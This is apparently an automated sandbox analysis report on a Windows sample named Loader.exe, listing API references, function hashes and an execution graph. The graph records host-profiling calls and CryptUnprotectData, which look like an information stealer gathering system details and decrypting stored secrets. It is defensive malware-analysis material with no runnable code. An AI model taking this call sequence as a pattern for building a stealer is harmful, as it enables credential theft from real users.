APIs
• _ValidateLocalCookies.LIBCMT ref: 6CE50DB7
• ___except_validate_context_record.LIBVCRUNTIME ref: 6CE50DBF
• _ValidateLocalCookies.LIBCMT ref: 6CE50E48
• __IsNonwritableInCurrentImage.LIBCMT ref: 6CE50E73
• _ValidateLocalCookies.LIBCMT ref: 6CE50EC8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: dc00db249eb1939f21ff292a7a94931ee97caaecf5674218ea37cf1aa10ee146
• Instruction ID: 009fc9deddabd3455ea43c3bcb4d410f32c3db22f8ae8c83906385e9dd24a9d7
• Opcode Fuzzy Hash: dc00db249eb1939f21ff292a7a94931ee97caaecf5674218ea37cf1aa10ee146
• Instruction Fuzzy Hash: A841B574A002489BCF00CF69C884ADEBBB5AF0532CF748559F9185B751DB37EA26CB91

Control-flow Graph (rendered graph for function 6ce538ed not reproduced; executed/not-executed colouring lost in extraction)
Strings
Memory Dump Source
• Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
• Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
Similarity
• API ID:
• String ID: C:\Users\user\Desktop\Loader.exe${:l
• API String ID: 0-698482631
• Opcode ID: b25c33fba457f5f8dd5253f5a0977c157083dc5a3f1bb9f1fd61debbf3c1ed27
• Instruction ID: 43688f1b7a16fa05a716d7e0ba0ad1ba56db5ff837d539b60f718676ef234030
• Opcode Fuzzy Hash: b25c33fba457f5f8dd5253f5a0977c157083dc5a3f1bb9f1fd61debbf3c1ed27
• Instruction Fuzzy Hash: DF21B0F1208605AFD7109B668C8099B777CAB0236C7B44619F81497B54E723ED758760

Control-flow Graph

APIs
  • Part of subcall function 6CE5771E: _free.LIBCMT ref: 6CE57743
• _free.LIBCMT ref: 6CE577A4
  • Part of subcall function 6CE52F67: HeapFree.KERNEL32(00000000,00000000,?,6CE52479), ref: 6CE52F7D
  • Part of subcall function 6CE52F67: GetLastError.KERNEL32(?,?,6CE52479), ref: 6CE52F8F
• _free.LIBCMT ref: 6CE577AF
• _free.LIBCMT ref: 6CE577BA
• _free.LIBCMT ref: 6CE5780E
• _free.LIBCMT ref: 6CE57819
• _free.LIBCMT ref: 6CE57824
• _free.LIBCMT ref: 6CE5782F
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 7df7bc2e45ad0bb9c7f8bc702183ee147632bc2a3689b57671c2733396f6c7e8
• Instruction ID: 9c43a9602d35e65c2ef9371c7b68d6e485ecfc3a3679a27b9328edf953dff022
• Opcode Fuzzy Hash: 7df7bc2e45ad0bb9c7f8bc702183ee147632bc2a3689b57671c2733396f6c7e8
• Instruction Fuzzy Hash: 9A114571550B04AAD620AB70EC46FD7B7BCDF00706FA04C1DA299A6650DB67B5384750
APIs
• GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CE568B7
• __fassign.LIBCMT ref: 6CE56A9C
• __fassign.LIBCMT ref: 6CE56AB9
• WriteFile.KERNEL32(?,6CE55099,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CE56B01
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CE56B41
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CE56BE9
Similarity
• API ID: FileWrite__fassign$ConsoleErrorLastOutput
• String ID:
• API String ID: 1735259414-0
• Opcode ID: 1d1aa2926a4616c9b7435d7eb83e396194bf673aadd650b767fca6aba4d30786
• Instruction ID: 82c11e7ffe5d781956d12cecb2ec55ce208e2e4bdbd4fdd88ac22aacb56b2b9d
• Opcode Fuzzy Hash: 1d1aa2926a4616c9b7435d7eb83e396194bf673aadd650b767fca6aba4d30786
• Instruction Fuzzy Hash: E7C18D75D012588FDF10CFE8C8809EDBBB9AF09318F68816AE855FB741D6329956CF60
APIs
• GetLastError.KERNEL32(00000001,?,6CE50F25,6CE4EF68,6CE4E92F,?,6CE4EB67,?,00000001,?,?,00000001,?,6CE5F8C8,0000000C,6CE4EC60), ref: 6CE51265
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CE51273
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CE5128C
• SetLastError.KERNEL32(00000000,6CE4EB67,?,00000001,?,?,00000001,?,6CE5F8C8,0000000C,6CE4EC60,?,00000001,?), ref: 6CE512DE
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 5495a814d825325f6f01e2831d70c9ab9e60615dde6622276d6eac9c2c7e8b7c
• Instruction ID: 39f30396f3819944235dd1a353a9adc8c78ee53768dea8f6299d16deedb6c526
• Opcode Fuzzy Hash: 5495a814d825325f6f01e2831d70c9ab9e60615dde6622276d6eac9c2c7e8b7c
• Instruction Fuzzy Hash: A601883A30D6115E9A041DF6ACC4A9E27B5DB037BC7B0032DF524D5ED0EF63C8666150
APIs
• FreeLibrary.KERNEL32(00000000,?,?,6CE51494,00000000,?,00000001,00000000,?,6CE5150B,00000001,FlsFree,6CE5B344,FlsFree,00000000), ref: 6CE51463
Strings
Similarity
• API ID: FreeLibrary
• String ID: api-ms-
• API String ID: 3664257935-2084034818
• Opcode ID: f201576d664ed4b2fc786d749429cc553b348ac852289bd7771220191f8d0d7f
• Instruction ID: 804e5988385779e8152a602e8d584141c1f81eb65162bdb02567eb5f51065bd8
• Opcode Fuzzy Hash: f201576d664ed4b2fc786d749429cc553b348ac852289bd7771220191f8d0d7f
• Instruction Fuzzy Hash: CA11C631B41665ABDB124EE9CC80B5D37B59F027B8FB50210E916EBB80D7B2ED1486E1
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CE51D99,?,?,6CE51D61,?,00000001,?), ref: 6CE51DFC
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CE51E0F
• FreeLibrary.KERNEL32(00000000,?,?,6CE51D99,?,?,6CE51D61,?,00000001,?), ref: 6CE51E32
Strings
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 25820f47b480369f1a0e6bc105cb4f23b785a0a4e25e1d626439f5e760b2d5bf
• Instruction ID: e5c131fc4fa4b41ee49cea5d6c46015bab69f52a6707385dfb6bc2c6fda2e457
• Opcode Fuzzy Hash: 25820f47b480369f1a0e6bc105cb4f23b785a0a4e25e1d626439f5e760b2d5bf
• Instruction Fuzzy Hash: B8F0A031A41218FBDF019F90CD09BAF7BB9EB0435AFB00060F500A2250DB36CE10DBA1
APIs
• _free.LIBCMT ref: 6CE576CD
  • Part of subcall function 6CE52F67: HeapFree.KERNEL32(00000000,00000000,?,6CE52479), ref: 6CE52F7D
  • Part of subcall function 6CE52F67: GetLastError.KERNEL32(?,?,6CE52479), ref: 6CE52F8F
• _free.LIBCMT ref: 6CE576DF
• _free.LIBCMT ref: 6CE576F1
• _free.LIBCMT ref: 6CE57703
• _free.LIBCMT ref: 6CE57715
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: f6241910e023049e312c88f68e0e38e09a891206c98c3d582b3ed2bc21506288
• Instruction ID: 64f280ece884102f7ca370c36db33f065ca6495034c465c78d85b038f039c609
• Opcode Fuzzy Hash: f6241910e023049e312c88f68e0e38e09a891206c98c3d582b3ed2bc21506288
• Instruction Fuzzy Hash: C7F04F315153049F8A04CBA8F489C5B33F9EB007187F04809F428E7F40CB33F8A08AA4
APIs
  • Part of subcall function 6CE5686F: GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CE568B7
• WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,6CE55099,?,00000000,00000000,6CE5FB78,0000002C,6CE5510A,?), ref: 6CE57222
• GetLastError.KERNEL32 ref: 6CE5722C
• __dosmaperr.LIBCMT ref: 6CE5726B
Strings
Similarity
• API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
• String ID: Ql
• API String ID: 910155933-1079734651
• Opcode ID: 53a72c140246bbe9c2540fbd9fa4775657eef9545b6ee70a7316d734866f79d5
• Instruction ID: 9c218d0bec657721027d927d364ef175d56e89b37a98abff9a89fc91e0fd3a5c
• Opcode Fuzzy Hash: 53a72c140246bbe9c2540fbd9fa4775657eef9545b6ee70a7316d734866f79d5
• Instruction Fuzzy Hash: B851E6B6A10209ABDB018FA5C944FDE7B79EF4631CFB48049E400ABB41D733DA768760
APIs
  • Part of subcall function 6CE537A7: _free.LIBCMT ref: 6CE537B5
  • Part of subcall function 6CE5437B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6CE56313,?,00000000,00000000), ref: 6CE54427
• GetLastError.KERNEL32 ref: 6CE531ED
• __dosmaperr.LIBCMT ref: 6CE531F4
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CE53233
• __dosmaperr.LIBCMT ref: 6CE5323A
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
• String ID:
• API String ID: 167067550-0
• Opcode ID: 1dc39052506076d9139bf905155369ec25f1cff5de83fec29adf97360038edb9
• Instruction ID: 799b903575a36e43ac866806814e451bb7d95830e9768ff04016a1006608ab68
• Opcode Fuzzy Hash: 1dc39052506076d9139bf905155369ec25f1cff5de83fec29adf97360038edb9
• Instruction Fuzzy Hash: 3921D671604A05BFD7105F668C8089777BCEF4236C7B48618F91897B40E733ED2587A0
APIs
• GetLastError.KERNEL32(?,?,?,6CE56CB7,?,00000001,6CE5510A,?,6CE57171,00000001,?,?,?,6CE55099,?,00000000), ref: 6CE52C2C
• _free.LIBCMT ref: 6CE52C89
• _free.LIBCMT ref: 6CE52CBF
• SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6CE57171,00000001,?,?,?,6CE55099,?,00000000,00000000,6CE5FB78,0000002C,6CE5510A), ref: 6CE52CCA
Similarity
• API ID: ErrorLast_free
• String ID:
APIs
• GetLastError.KERNEL32(?,?,00000001,6CE53050,6CE52F8D,?,?,6CE52479), ref: 6CE52D83
• _free.LIBCMT ref: 6CE52DE0
• _free.LIBCMT ref: 6CE52E16
• SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,00000001,6CE53050,6CE52F8D,?,?,6CE52479), ref: 6CE52E21
Similarity
• API ID: ErrorLast_free
• String ID:
APIs
• WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CE57960,?,00000001,?,00000001,?,6CE56C46,?,?,00000001), ref: 6CE57F1D
• GetLastError.KERNEL32(?,6CE57960,?,00000001,?,00000001,?,6CE56C46,?,?,00000001,?,00000001,?,6CE57192,6CE55099), ref: 6CE57F29
  • Part of subcall function 6CE57EEF: CloseHandle.KERNEL32(FFFFFFFE,6CE57F39,?,6CE57960,?,00000001,?,00000001,?,6CE56C46,?,?,00000001,?,00000001), ref: 6CE57EFF
• ___initconout.LIBCMT ref: 6CE57F39
  • Part of subcall function 6CE57EB1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CE57EE0,6CE5794D,00000001,?,6CE56C46,?,?,00000001,?), ref: 6CE57EC4
• WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CE57960,?,00000001,?,00000001,?,6CE56C46,?,?,00000001,?), ref: 6CE57F4E
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
Strings
Similarity
• API ID:
• String ID: C:\Users\user\Desktop\Loader.exe
APIs
  • Part of subcall function 6CE5660F: EnterCriticalSection.KERNEL32(00000001,?,6CE5704E,?,6CE5FC18,00000010,6CE551AD,00000000,00000000,?,?,?,?,6CE551F1,?,00000000), ref: 6CE5662A
• FlushFileBuffers.KERNEL32(00000000,6CE5FBF8,0000000C,6CE56857,Ql,?,00000001,?,6CE5510A,?), ref: 6CE56799
• GetLastError.KERNEL32 ref: 6CE567AA
Strings
Similarity
• API ID: BuffersCriticalEnterErrorFileFlushLastSection
• String ID: Ql
                                                                                                                                                                                                                                                                  • API String ID: 4109680722-1079734651
                                                                                                                                                                                                                                                                  • Opcode ID: c94376281d31228557a1f3a88f5897e7e479b7cac9262494b7ba7a0be5feed55
                                                                                                                                                                                                                                                                  • Instruction ID: 5d7aec52b2caae7a1c516d2b22fc448f5cde805beddfb7583b09a9f01fc30d8f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c94376281d31228557a1f3a88f5897e7e479b7cac9262494b7ba7a0be5feed55
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F019272A00710CFC7149FB8D94469E7BB4EB49724F60411EE411DB7D0D7B6D9558B50

Execution Graph

Execution Coverage: 9.1%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 59.6%
Total number of Nodes: 497
Total number of Limit Nodes: 38
                                                                                                                                                                                                                                                                  execution_graph 15178 72c38600 15180 72c3860f 15178->15180 15179 72c38a48 ExitProcess 15180->15179 15181 72c38a31 15180->15181 15182 72c38624 GetCurrentProcessId GetCurrentThreadId 15180->15182 15193 72c6e080 15181->15193 15183 72c38650 SHGetSpecialFolderPathW 15182->15183 15184 72c3864c 15182->15184 15186 72c38880 15183->15186 15184->15183 15187 72c38964 GetForegroundWindow 15186->15187 15188 72c38982 15187->15188 15188->15181 15190 72c3b7b0 FreeLibrary 15188->15190 15191 72c3b7cc 15190->15191 15192 72c3b7d1 FreeLibrary 15191->15192 15192->15181 15196 72c6f970 15193->15196 15195 72c6e085 FreeLibrary 15195->15179 15197 72c6f979 15196->15197 15197->15195 15198 72c3e687 15199 72c3e6a0 15198->15199 15204 72c69280 15199->15204 15201 72c3e77a 15202 72c69280 11 API calls 15201->15202 15203 72c3e908 15202->15203 15203->15203 15205 72c692b0 CoCreateInstance 15204->15205 15207 72c69906 15205->15207 15208 72c694e4 SysAllocString 15205->15208 15210 72c69916 GetVolumeInformationW 15207->15210 15211 72c69574 15208->15211 15219 72c69934 15210->15219 15212 72c698f5 SysFreeString 15211->15212 15213 72c6957c CoSetProxyBlanket 15211->15213 15212->15207 15214 72c6959c SysAllocString 15213->15214 15215 72c698eb 15213->15215 15217 72c696a0 15214->15217 15215->15212 15217->15217 15218 72c69701 SysAllocString 15217->15218 15222 72c69728 15218->15222 15219->15201 15220 72c698d6 SysFreeString SysFreeString 15220->15215 15221 72c698cc 15221->15220 15222->15220 15222->15221 15223 72c6976f VariantInit 15222->15223 15225 72c697c0 15223->15225 15224 72c698bb VariantClear 15224->15221 15225->15224 14884 72c3ce45 14885 72c3ce4b 14884->14885 14886 72c3ce55 CoUninitialize 14885->14886 14887 72c3ce80 14886->14887 14887->14887 15226 72c6eb88 15227 
72c6eba0 15226->15227 15228 72c6ebde 15227->15228 15233 72c6e110 LdrInitializeThunk 15227->15233 15230 72c6ec4e 15228->15230 15232 72c6e110 LdrInitializeThunk 15228->15232 15232->15230 15233->15228 14888 72c5d34a 14889 72c5d370 14888->14889 14890 72c5d3ea GetPhysicallyInstalledSystemMemory 14889->14890 14891 72c5d410 14890->14891 14891->14891 14892 72c3ef53 CoInitializeEx CoInitializeEx 15234 72c5d893 15235 72c5d896 FreeLibrary 15234->15235 15236 72c5dbc9 15235->15236 15237 72c5dc30 GetComputerNameExA 15236->15237 14893 72c6c55b RtlAllocateHeap 15243 72c39d1e 15244 72c39d40 15243->15244 15244->15244 15245 72c39d94 LoadLibraryExW 15244->15245 15246 72c39da5 15245->15246 15247 72c39e74 LoadLibraryExW 15246->15247 15248 72c39e85 15247->15248 14894 72c6e967 14895 72c6e980 14894->14895 14898 72c6e110 LdrInitializeThunk 14895->14898 14897 72c6e9ef 14898->14897 14899 72c67764 14900 72c6777c 14899->14900 14901 72c6779d GetUserDefaultUILanguage 14900->14901 14902 72c677c7 14901->14902 15249 72c41227 15250 72c41241 15249->15250 15251 72c414e5 RtlExpandEnvironmentStrings 15250->15251 15255 72c3f444 15250->15255 15256 72c41562 15251->15256 15252 72c38b60 ExitProcess 15253 72c41c4e 15252->15253 15257 72c457c0 15253->15257 15256->15252 15256->15255 15258 72c457e0 15257->15258 15258->15258 15259 72c71320 LdrInitializeThunk 15258->15259 15260 72c458ed 15259->15260 15261 72c4590f 15260->15261 15262 72c45cad 15260->15262 15263 72c71650 LdrInitializeThunk 15260->15263 15266 72c45ae8 15260->15266 15270 72c45b92 15260->15270 15274 72c4594e 15260->15274 15261->15262 15264 72c71720 LdrInitializeThunk 15261->15264 15261->15266 15261->15270 15261->15274 15267 72c71650 LdrInitializeThunk 15262->15267 15262->15274 15275 72c45cf7 15262->15275 15263->15261 15265 72c4593f 15264->15265 15265->15262 15265->15266 15265->15270 15265->15274 15266->15274 15338 72c6e110 LdrInitializeThunk 15266->15338 15267->15275 15269 72c466be 15290 72c46792 15269->15290 15339 72c6e110 LdrInitializeThunk 
15269->15339 15271 72c71320 LdrInitializeThunk 15270->15271 15271->15262 15272 72c71720 LdrInitializeThunk 15272->15275 15273 72c460df 15273->15255 15286 72c46319 15273->15286 15291 72c4634d 15273->15291 15294 72c4c8a0 15273->15294 15274->15255 15274->15274 15275->15272 15275->15273 15275->15275 15281 72c460b5 CryptUnprotectData 15275->15281 15293 72c6e110 LdrInitializeThunk 15275->15293 15280 72c46f0e 15281->15273 15281->15275 15282 72c4c8a0 3 API calls 15282->15274 15283 72c465bd 15283->15282 15306 72c49ad0 15286->15306 15287 72c4731b 15289 72c468eb 15289->15280 15289->15289 15341 72c6e110 LdrInitializeThunk 15289->15341 15290->15289 15340 72c6e110 LdrInitializeThunk 15290->15340 15291->15274 15291->15283 15292 72c714b0 LdrInitializeThunk 15291->15292 15292->15291 15293->15275 15295 72c4c8ca 15294->15295 15342 72c44ca0 15295->15342 15297 72c4c9cb 15298 72c44ca0 3 API calls 15297->15298 15299 72c4ca59 15298->15299 15300 72c44ca0 3 API calls 15299->15300 15301 72c4cadf 15300->15301 15302 72c44ca0 3 API calls 15301->15302 15303 72c4cbf9 15302->15303 15304 72c44ca0 3 API calls 15303->15304 15305 72c4cc62 15304->15305 15305->15286 15307 72c49b00 15306->15307 15311 72c49b78 15307->15311 15416 72c6e110 LdrInitializeThunk 15307->15416 15309 72c49cbe 15314 72c49d6e 15309->15314 15331 72c46338 15309->15331 15418 72c6e110 LdrInitializeThunk 15309->15418 15311->15309 15417 72c6e110 LdrInitializeThunk 15311->15417 15313 72c49eef 15315 72c6c570 RtlFreeHeap 15313->15315 15314->15313 15322 72c49f48 15314->15322 15419 72c6e110 LdrInitializeThunk 15314->15419 15315->15322 15317 72c4a2a7 FreeLibrary 15321 72c4a157 15317->15321 15319 72c4a152 15319->15317 15320 72c4a216 FreeLibrary 15319->15320 15324 72c4a230 15320->15324 15321->15331 15421 72c6e110 LdrInitializeThunk 15321->15421 15322->15317 15322->15319 15322->15321 15322->15331 15420 72c6e110 LdrInitializeThunk 15322->15420 15326 72c4a2a2 15324->15326 15422 72c6e110 LdrInitializeThunk 15324->15422 15329 72c4a3fe 15326->15329 
15423 72c6e110 LdrInitializeThunk 15326->15423 15328 72c4ac58 15330 72c6c570 RtlFreeHeap 15328->15330 15329->15331 15337 72c4a4de 15329->15337 15424 72c6e110 LdrInitializeThunk 15329->15424 15330->15331 15331->15269 15331->15291 15333 72c6c830 LdrInitializeThunk 15333->15337 15334 72c6c990 LdrInitializeThunk 15334->15337 15335 72c6e110 LdrInitializeThunk 15335->15337 15336 72c6c570 RtlFreeHeap 15336->15337 15337->15328 15337->15333 15337->15334 15337->15335 15337->15336 15338->15269 15339->15290 15340->15289 15341->15287 15343 72c44cc0 15342->15343 15344 72c71320 LdrInitializeThunk 15343->15344 15345 72c44e14 15344->15345 15346 72c71320 LdrInitializeThunk 15345->15346 15371 72c45021 15346->15371 15347 72c4509e 15348 72c450e9 15347->15348 15349 72c4522e 15347->15349 15381 72c45170 15347->15381 15351 72c6c570 RtlFreeHeap 15348->15351 15349->15297 15354 72c450ef 15351->15354 15352 72c45551 15401 72c6e110 LdrInitializeThunk 15352->15401 15355 72c45152 15354->15355 15410 72c6e110 LdrInitializeThunk 15354->15410 15356 72c45625 15355->15356 15357 72c456a1 15355->15357 15358 72c4579e 15355->15358 15359 72c456d2 15355->15359 15360 72c455d3 15355->15360 15361 72c457b0 15355->15361 15362 72c4563c 15355->15362 15366 72c6c5a0 2 API calls 15355->15366 15378 72c455ff 15355->15378 15380 72c45696 15355->15380 15370 72c71320 LdrInitializeThunk 15356->15370 15357->15359 15357->15362 15364 72c71650 LdrInitializeThunk 15357->15364 15357->15378 15357->15380 15367 72c6c990 LdrInitializeThunk 15358->15367 15365 72c71650 LdrInitializeThunk 15359->15365 15360->15356 15360->15357 15360->15358 15360->15359 15360->15361 15360->15362 15360->15378 15360->15380 15402 72c6ca40 15360->15402 15368 72c6c990 LdrInitializeThunk 15361->15368 15363 72c71720 LdrInitializeThunk 15362->15363 15362->15378 15362->15380 15363->15362 15364->15359 15365->15362 15373 72c455c7 15366->15373 15367->15361 15374 72c457b9 15368->15374 15370->15362 15371->15347 15371->15348 15371->15381 15383 72c6e110 LdrInitializeThunk 
15371->15383 15372 72c6e110 LdrInitializeThunk 15372->15381 15379 72c6c830 LdrInitializeThunk 15373->15379 15374->15374 15378->15297 15379->15360 15380->15378 15411 72c6e110 LdrInitializeThunk 15380->15411 15381->15349 15381->15352 15381->15372 15384 72c69d30 15381->15384 15383->15347 15386 72c69d40 15384->15386 15385 72c6e0a0 2 API calls 15385->15386 15386->15385 15389 72c69e53 15386->15389 15412 72c6e110 LdrInitializeThunk 15386->15412 15387 72c6a25b 15390 72c6c570 RtlFreeHeap 15387->15390 15389->15387 15391 72c6c830 LdrInitializeThunk 15389->15391 15392 72c6a274 15390->15392 15398 72c69e9a 15391->15398 15392->15381 15393 72c6a25f 15394 72c6c990 LdrInitializeThunk 15393->15394 15394->15387 15395 72c6e0a0 2 API calls 15395->15398 15396 72c6e110 LdrInitializeThunk 15396->15398 15397 72c6c570 RtlFreeHeap 15397->15398 15398->15393 15398->15395 15398->15396 15398->15397 15399 72c6a281 15398->15399 15400 72c6c570 RtlFreeHeap 15399->15400 15400->15393 15401->15354 15403 72c6ca5a 15402->15403 15409 72c455f1 15402->15409 15404 72c6cae2 15403->15404 15403->15409 15413 72c6e110 LdrInitializeThunk 15403->15413 15404->15404 15406 72c6cc4e 15404->15406 15414 72c6e110 LdrInitializeThunk 15404->15414 15406->15409 15415 72c6e110 LdrInitializeThunk 15406->15415 15409->15356 15409->15357 15409->15358 15409->15359 15409->15361 15409->15362 15409->15378 15409->15380 15410->15355 15411->15358 15412->15386 15413->15404 15414->15406 15415->15409 15416->15311 15417->15309 15418->15314 15419->15313 15420->15319 15421->15331 15422->15326 15423->15329 15424->15337 14903 72c6e760 14905 72c6e780 14903->14905 14904 72c6e7be 14905->14904 14907 72c6e110 LdrInitializeThunk 14905->14907 14907->14904 15425 72c68ea0 15426 72c68ec5 15425->15426 15429 72c68fc9 15426->15429 15434 72c6e110 LdrInitializeThunk 15426->15434 15427 72c69210 15429->15427 15431 72c690e1 15429->15431 15433 72c6e110 LdrInitializeThunk 15429->15433 15431->15427 15435 72c6e110 LdrInitializeThunk 15431->15435 15433->15429 
15434->15426 15435->15431 15436 72c6c5a0 15437 72c6c5d0 15436->15437 15439 72c6c62e 15437->15439 15444 72c6e110 LdrInitializeThunk 15437->15444 15439->15439 15441 72c6c749 15439->15441 15442 72c6c801 15439->15442 15445 72c6e110 LdrInitializeThunk 15439->15445 15440 72c6c570 RtlFreeHeap 15440->15442 15441->15440 15441->15441 15444->15439 15445->15441 15446 72c70d20 15447 72c70d2f 15446->15447 15450 72c70e98 15447->15450 15454 72c6e110 LdrInitializeThunk 15447->15454 15448 72c7114b 15450->15448 15453 72c7108e 15450->15453 15455 72c6e110 LdrInitializeThunk 15450->15455 15451 72c6c570 RtlFreeHeap 15451->15448 15453->15451 15454->15450 15455->15453 14908 72c3a369 14909 72c3a430 14908->14909 14909->14909 14912 72c3b100 14909->14912 14911 72c3a479 14913 72c3b190 14912->14913 14915 72c3b1b5 14913->14915 14916 72c6e0a0 14913->14916 14915->14911 14917 72c6e0c0 14916->14917 14918 72c6e0d4 14916->14918 14919 72c6e0f3 14916->14919 14922 72c6e0e8 14916->14922 14917->14918 14917->14919 14921 72c6e0d9 RtlReAllocateHeap 14918->14921 14923 72c6c570 14919->14923 14921->14922 14922->14913 14924 72c6c585 14923->14924 14925 72c6c583 14923->14925 14926 72c6c58a RtlFreeHeap 14924->14926 14925->14922 14926->14922 15456 72c60b2b CoSetProxyBlanket 14928 72c5c9eb 14931 72c5c8e2 14928->14931 14929 72c5cab5 14931->14929 14932 72c6e110 LdrInitializeThunk 14931->14932 14932->14931 15457 72c6e3a9 15458 72c6e3b2 GetForegroundWindow 15457->15458 15459 72c6e3c9 15458->15459 15460 72c6ea29 15461 72c6ea50 15460->15461 15463 72c6ea8e 15461->15463 15467 72c6e110 LdrInitializeThunk 15461->15467 15466 72c6e110 LdrInitializeThunk 15463->15466 15465 72c6eb59 15466->15465 15467->15463 14933 72c3de73 14934 72c3ded0 14933->14934 14934->14934 14935 72c3df1e 14934->14935 14937 72c6e110 LdrInitializeThunk 14934->14937 14937->14935 14938 72c5dc76 14939 72c5dc7c 14938->14939 14939->14939 14940 72c5dcf0 GetComputerNameExA 14939->14940 14941 72c3ec77 CoInitializeSecurity CoInitializeSecurity 14942 72c518f0 14943 
72c518fe 14942->14943 14946 72c51950 14942->14946 14948 72c51a10 14943->14948 14949 72c51a20 14948->14949 14949->14949 14952 72c714b0 14949->14952 14951 72c51b0f 14954 72c714d0 14952->14954 14953 72c715fe 14953->14951 14954->14953 14956 72c6e110 LdrInitializeThunk 14954->14956 14956->14953 14957 72c3cc7a 15010 72c38b60 14957->15010 14959 72c3cc86 14960 72c38b60 ExitProcess 14959->14960 14961 72c3cca2 14960->14961 15015 72c542d0 14961->15015 14963 72c3cca8 14964 72c38b60 ExitProcess 14963->14964 14965 72c3ccbe 14964->14965 15026 72c54560 14965->15026 14967 72c3ccc4 14968 72c38b60 ExitProcess 14967->14968 14969 72c3ccd7 14968->14969 15037 72c57440 14969->15037 14973 72c3ccef 15062 72c59e80 14973->15062 14975 72c3ccf8 14976 72c38b60 ExitProcess 14975->14976 14977 72c3cd0e 14976->14977 15066 72c590d0 14977->15066 14979 72c3cd14 14980 72c38b60 ExitProcess 14979->14980 14981 72c3cd2a 14980->14981 14982 72c63e30 6 API calls 14981->14982 14983 72c3cd39 14982->14983 14984 72c38b60 ExitProcess 14983->14984 14985 72c3cd4c 14984->14985 14986 72c38b60 ExitProcess 14985->14986 14987 72c3cd68 14986->14987 14988 72c542d0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 14987->14988 14989 72c3cd6e 14988->14989 14990 72c38b60 ExitProcess 14989->14990 14991 72c3cd84 14990->14991 14992 72c54560 RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 14991->14992 14993 72c3cd8a 14992->14993 14994 72c38b60 ExitProcess 14993->14994 14995 72c3cd9d 14994->14995 14996 72c57440 RtlFreeHeap LdrInitializeThunk 14995->14996 14997 72c3cdac 14996->14997 14998 72c57740 RtlFreeHeap LdrInitializeThunk 14997->14998 14999 72c3cdb5 14998->14999 15000 72c59e80 RtlExpandEnvironmentStrings 14999->15000 15001 72c3cdbe 15000->15001 15002 72c38b60 ExitProcess 15001->15002 15003 72c3cdd4 15002->15003 15004 72c590d0 RtlExpandEnvironmentStrings 15003->15004 15005 72c3cdda 15004->15005 15006 72c38b60 ExitProcess 15005->15006 15007 72c3cdf0 15006->15007 15008 72c63e30 6 
